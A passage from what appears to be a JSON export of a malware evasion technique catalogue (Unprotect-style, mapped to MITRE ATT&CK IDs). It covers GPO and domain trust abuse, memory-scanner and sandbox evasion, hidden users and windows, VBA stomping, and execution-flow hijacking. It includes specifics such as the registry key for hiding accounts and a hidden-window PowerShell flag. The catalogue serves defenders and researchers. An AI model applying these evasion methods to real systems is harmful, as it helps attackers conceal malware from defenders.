"key": "domain-policy-modification-group-policy-modification",
"unprotect_id": "T1484.001",
"name": "Domain Policy Modification: Group Policy Modification",
"description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.\r\n\r\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\r\n\r\nMalicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more. Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.\r\n\r\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.[3][4] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.",
"resources": "https://attack.mitre.org/techniques/T1484/001/",
"creation_date": "2023-01-27T03:02:16.993000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nPersistence,\r\nGroup Policy Objects (GPOs),\r\nNew-GPOImmediateTask,\r\nScheduledTasks.xml,\r\nGptTmpl.inf,\r\nGPO modification privileges,\r\ndelegate GPO access control permissions,",
"modification_date": "2023-10-04T10:44:08.030000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 233,
"key": "domain-policy-modification-domain-trust-modification",
"unprotect_id": "T1484.002",
"name": "Domain Policy Modification: Domain Trust Modification",
"description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\r\n\r\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.",
"resources": "https://attack.mitre.org/techniques/T1484/002/",
"creation_date": "2023-01-27T03:09:57.300000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nDomain trust details,\r\nadd fake certificate,\r\nSAML Tokens,\r\nfederated domain,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:07.474000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 234,
"key": "avoiding-memory-scanners-yara-pe-sieve",
"unprotect_id": "U1009",
"name": "Avoiding Memory Scanners (Yara, Pe-sieve...)",
"description": "Avoiding Memory Scanners is a technique that enables malware creators to bypass the detection of endpoint security software and reverse engineers by using memory scanning to locate shellcode and malware in Windows memory. \r\n\r\nThe technique involves understanding how memory scanners work and implementing a stable evasion method for each of the memory scanning tools, such as PE-sieve, MalMemDetect, Moneta, Volatility malfind, and YARA. The goal of this technique is to hide the presence of malware from these tools and maintain its malicious functionality.",
"resources": "https://youtu.be/9z9PHSk2MsY\nhttps://github.com/kyleavery/AceLdr",
"creation_date": "2023-01-29T23:45:51.133000Z",
"tags": "YARA, PE-SIEVE, Monetta, Endpoint, Memory Scan",
"modification_date": "2023-10-04T10:43:03.446000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 235,
"key": "return-address-spoofing",
"unprotect_id": "U0518",
"name": "Return Address Spoofing",
"description": "Return Address Spoofing is a technique used in x64 architecture to bypass the limitations of the x64 fastcall mechanism. The traditional method of spoofing return addresses in x86 (e.g. using a ret in a game module as a trampoline) is not feasible in x64 due to caller cleanup and red zone.\r\n\r\nTo overcome this, the code creates a temporary storage for the shellcode on the stack, where the address of a gadget and the called function are stored. An extra 8 bytes are reserved for the shellcode. The address of the storage is then passed to the shellcode, which reads the addresses, stores the original return address, the original content of the nonvolatile register (rbx), and the shellcode's return address.\r\n\r\nThe shellcode then jumps into the called function, which runs and returns to the gadget (jmp [rbx]). The remaining shellcode restores rbx, aligns the stack, and \"returns\" to the original return address using a jump instruction. This technique enables the shellcode to hide its presence from endpoint security software and memory scanners, while maintaining its malicious functionality.",
"resources": "https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html",
"creation_date": "2023-01-29T23:50:58.846000Z",
"tags": "",
"modification_date": "2023-10-04T10:45:01.928000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 236,
"key": "cpu-counting",
"unprotect_id": "U1340,B0009.018",
"name": "CPU Counting",
"description": "In many sandboxes, due to virtualization constraints, the number of CPUs may be limited to one. However, in the real world, all x86 CPUs have been sold with multiple cores or at least hyperthreading for over a decade. \r\n\r\nAs a result, it is sometimes possible to detect virtualization or sandboxing by examining the number of CPUs on the system. This information can be obtained without making API calls, simply by checking the PEB, which holds this information. The presence of hyperthreading can also be detected by directly asking the CPU using the CPUID instruction.",
"resources": "",
"creation_date": "2023-01-29T23:58:47.355000Z",
"tags": "Sandbox, virtualization constraint, CPU count, workstations, servers, x86 CPU, multi-core, hyperthreading, virtualization detection, Windows API, WMI, registry, PEB, hyperthreading detection, CPUID instruction",
"modification_date": "2023-05-13T05:20:40.510000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 237,
"key": "domain-member",
"unprotect_id": "U1341",
"name": "Domain Member",
"description": "This technique determines if a host is a member of an Active Directory Domain without API calls. It helps prevent malicious payload execution in enterprise sandboxes that are not members of an Active Directory domain. The validation is done by checking the \"LoggonServer\" and \"ComputerName\" environment variables. If the host is logged into a domain controller, the \"LoggonServer\" value will contain the name of the logged-in server, otherwise both variables contain the same hostname. This information is stored in the process memory, allowing for undetectable domain membership validation without API calls.",
"resources": "",
"creation_date": "2023-01-30T00:03:56.393000Z",
"tags": "technique, Active Directory Domain, enterprise sandboxes, malicious payload, LoggonServer, ComputerName, domain controller, hostname, process memory, undetectable, API calls",
"modification_date": "2023-01-30T00:03:56.393000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 238,
"key": "windows-file-and-directory-permissions-modification",
"unprotect_id": "T1222.001",
"name": "Windows File and Directory Permissions Modification",
"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\r\n\r\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs). Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.\r\n\r\nAdversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.",
"resources": "https://attack.mitre.org/techniques/T1222/001/",
"creation_date": "2023-01-31T01:31:58.384000Z",
"tags": "Defense Evasion,\r\nPersistence,\r\nevade access control lists (ACLs),\r\nicacls, \r\ncacls, \r\ntakeown, \r\nattrib,\r\nHijack Execution Flow,\r\nDiscretionary Access Control Lists (DACLs),\r\nAccessibility Features, \r\nBoot Initialization Scripts,\r\nLogon Initialization Scripts,",
"modification_date": "2023-10-04T10:44:29.110000Z",
"category": [
10
],
"rules": [],
"attachments": [
"b913237e-4937-4062-9187-b752a00d818c"
],
"featured_api": [],
"contributors": []
},
{
"id": 239,
"key": "hide-artifacts-hidden-files-and-directories",
"unprotect_id": "T1564.001",
"name": "Hide Artifacts: Hidden Files and Directories",
"description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows).\r\n\r\nUsers can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\r\n\r\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
"resources": "https://attack.mitre.org/techniques/T1564/001/",
"creation_date": "2023-01-31T01:37:25.064000Z",
"tags": "Defense Evasion,\r\nhidden files,\r\nhidden folders,\r\nattrib.exe,\r\n.ssh,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:08.273000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 240,
"key": "hide-artifacts-hidden-users",
"unprotect_id": "T1564.002",
"name": "Hide Artifacts: Hidden Users",
"description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.\r\n\r\nAdversaries may hide user accounts in Windows. Adversaries can set the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.",
"resources": "https://attack.mitre.org/techniques/T1564/002/",
"creation_date": "2023-01-31T01:41:37.835000Z",
"tags": "Defense Evasion,\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\r\nDragonfly,\r\nsupress users from login screen,",
"modification_date": "2023-10-04T10:43:35.458000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 241,
"key": "hide-artifacts-hidden-window",
"unprotect_id": "T1564.003",
"name": "Hide Artifacts: Hidden Window",
"description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.\r\n\r\nOn Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. \r\n\r\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.",
"resources": "https://attack.mitre.org/techniques/T1564/003/",
"creation_date": "2023-01-31T01:47:46.570000Z",
"tags": "Defense Evasion,\r\n-WindowStyle Hidden,\r\nsupress windows,\r\nAPT19,\r\nAPT28,\r\nAPT3,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:57.218000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 242,
"key": "hide-artifacts-ntfs-file-attributes",
"unprotect_id": "T1564.004",
"name": "Hide Artifacts: NTFS File Attributes",
"description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). \r\n\r\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.",
"resources": "https://attack.mitre.org/techniques/T1564/004/",
"creation_date": "2023-01-31T01:52:26.125000Z",
"tags": "Defense Evasion,\r\nNew Technology File System (NTFS),\r\nMaster File Table (MFT),\r\nExtended Attributes (EA),\r\nAlternate Data Streams (ADSs),\r\nattribute metadata,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:05.485000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 243,
"key": "hide-artifacts-hidden-file-system",
"unprotect_id": "T1564.005",
"name": "Hide Artifacts: Hidden File System",
"description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.\r\n\r\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions. Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system. Adversaries may also fragment files across the existing file system structure in non-standard ways.",
"resources": "https://attack.mitre.org/techniques/T1564/005/",
"creation_date": "2023-01-31T01:55:59.336000Z",
"tags": "Defense Evasion,\r\nFAT, \r\nNTFS, \r\next4, \r\nAPFS,\r\nVolume Boot Record (VBR),\r\nMaster File Table (MFT),\r\nvirtual file systems,\r\nportable partition image,\r\nreserved disk space,\r\nfile fragmentation,",
"modification_date": "2023-10-04T10:44:08.518000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 244,
"key": "hide-artifacts-run-virtual-instance",
"unprotect_id": "T1564.006",
"name": "Hide Artifacts: Run Virtual Instance",
"description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.\r\n\r\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.",
"resources": "https://attack.mitre.org/techniques/T1564/006/",
"creation_date": "2023-01-31T02:00:27.059000Z",
"tags": "Defense Evasion,\r\nvirtualization,\r\nVirtualBox,\r\nVMWare,\r\nHyperV,\r\ncompromise host,",
"modification_date": "2023-10-04T10:42:09.202000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 245,
"key": "hide-artifacts-vba-stomping",
"unprotect_id": "T1564.007",
"name": "Hide Artifacts: VBA Stomping",
"description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.\r\n\r\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.\r\n\r\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.",
"resources": "https://attack.mitre.org/techniques/T1564/007/",
"creation_date": "2023-01-31T02:03:17.102000Z",
"tags": "Defense Evasion,\r\nPerformanceCache,\r\n_VBA_PROJECT,\r\nMicrosoft Office,\r\nVisual Basic for Applications (VBA),\r\np-code,\r\nproject stream,\r\nmalicious code,",
"modification_date": "2023-10-04T10:44:36.443000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 246,
"key": "hide-artifacts-email-hiding-rules",
"unprotect_id": "T1564.008",
"name": "Hide Artifacts: Email Hiding Rules",
"description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems.\r\n\r\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account.\r\n\r\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines.",
"resources": "https://attack.mitre.org/techniques/T1564/008/",
"creation_date": "2023-01-31T02:06:43.058000Z",
"tags": "Defense Evasion\r\nNew-InboxRule,\r\nSet-InboxRule,\r\nmailbox rules,\r\nmailbox folders,\r\ninbound emails,\r\nphishing,",
"modification_date": "2023-10-04T10:44:50.279000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 247,
"key": "hide-artifacts-process-argument-spoofing",
"unprotect_id": "T1564.010",
"name": "Hide Artifacts: Process Argument Spoofing",
"description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.\r\n\r\nAdversaries may manipulate a process PEB to evade defenses. For example, Process Hollowing can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the Native API WriteProcessMemory() function) then resume process execution with malicious arguments.\r\n\r\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.\r\n\r\nThis behavior may also be combined with other tricks (such as Parent PID Spoofing) to manipulate or further evade process-based detections.",
"resources": "https://attack.mitre.org/techniques/T1564/010/",
"creation_date": "2023-01-31T02:10:02.144000Z",
"tags": "Defense Evasion,\r\nprocess environment block (PEB),\r\nProcess Hollowing,\r\nWriteProcessMemory(),\r\nParent PID Spoofing,\r\nmalicious cmd arguments,",
"modification_date": "2023-10-04T10:44:08.779000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 248,
"key": "hijack-execution-flow-dll-side-loading",
"unprotect_id": "T1574.002",
"name": "Hijack Execution Flow: DLL Side-Loading",
"description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\r\n\r\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.",
"resources": "https://attack.mitre.org/techniques/T1574/002/",
"creation_date": "2023-01-31T02:14:22.259000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nDLL search order,\r\nAPT19,\r\nAPT3,\r\nAPT32,\r\nAPT41,\r\nsigned executables,\r\nmimic legitimate DLL,\r\nencrypted payload,\r\npacked payload,\r\nobfuscated payload,",
"modification_date": "2023-10-04T10:44:09.025000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 249,
"key": "hijack-execution-flow-executable-installer-file-permissions-weakness",
"unprotect_id": "T1574.005",
"name": "Hijack Execution Flow: Executable Installer File Permissions Weakness",
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\r\n\r\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.\r\n\r\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"resources": "https://attack.mitre.org/techniques/T1574/005/",
"creation_date": "2023-01-31T02:20:35.493000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nDLL Search Order Hijacking,\r\nwrite access,\r\nmalicious binaries,\r\nbinary hijack,\r\nprivilege escalation,\r\nBypass User Account Control,\r\n%TEMP%,",
"modification_date": "2023-10-04T10:44:09.321000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 250,
"key": "hijack-execution-flow-path-interception-by-path-environment-variable",
"unprotect_id": "T1574.007",
"name": "Hijack Execution Flow: Path Interception by PATH Environment Variable",
"description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\r\n\r\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\r\n\r\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
"resources": "https://attack.mitre.org/techniques/T1574/007/",
"creation_date": "2023-01-31T02:24:05.669000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nPATH environment variable,\r\npath interception,\r\nexecute malicious payloads,\r\n %SystemRoot%\\system32,",
"modification_date": "2023-10-04T10:44:09.595000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 251,
"key": "hijack-execution-flow-path-interception-by-search-order-hijacking",
"unprotect_id": "T1574.008",
"name": "Hijack Execution Flow: Path Interception by Search Order Hijacking",
"description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\r\n\r\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\r\n\r\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. \r\n\r\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.",
"resources": "https://attack.mitre.org/techniques/T1574/008/",
"creation_date": "2023-01-31T02:26:31.828000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nsearch order hijacking,\r\npath interception,\r\nhijacking DLL loads,\r\nPATHEXT,",
"modification_date": "2023-10-04T10:43:56.166000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 252,
"key": "hijack-execution-flow-path-interception-by-unquoted-path",
"unprotect_id": "T1574.009",
"name": "Hijack Execution Flow: Path Interception by Unquoted Path",
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\r\n\r\nService paths and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program.\r\n\r\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
"resources": "https://attack.mitre.org/techniques/T1574/009/",
"creation_date": "2023-01-31T02:32:19.133000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nprivilege escalation,\r\nunquoted path,\r\npath interception,\r\nhigher level directory,",
"modification_date": "2023-10-04T10:44:09.862000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 253,
"key": "hijack-execution-flow-services-file-permissions-weakness",
"unprotect_id": "T1574.010",
"name": "Hijack Execution Flow: Services File Permissions Weakness",
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\r\n\r\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"resources": "https://attack.mitre.org/techniques/T1574/010/",
"creation_date": "2023-01-31T04:30:16.669000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nWindows services,\r\nbinary permissions,\r\nservice hijack,\r\nbinary hijack,",
"modification_date": "2023-10-04T10:44:10.124000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 254,
"key": "hijack-execution-flow-services-registry-permissions-weakness",
"unprotect_id": "T1574.011",
"name": "Hijack Execution Flow: Services Registry Permissions Weakness",
"description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. \r\n\r\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\r\n\r\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.\r\n\r\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.[5] If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.\r\n\r\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities. Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.",
"resources": "https://attack.mitre.org/techniques/T1574/011/",
"creation_date": "2023-01-31T04:33:41.271000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nregistry key manipulation,\r\nservice hijack,\r\nFailureCommand,\r\nPerformance key,\r\nCreate Subkey permission,\r\nParameters key,\r\nmalicious DLL,\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll,",
"modification_date": "2023-10-04T10:43:59.801000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 255,
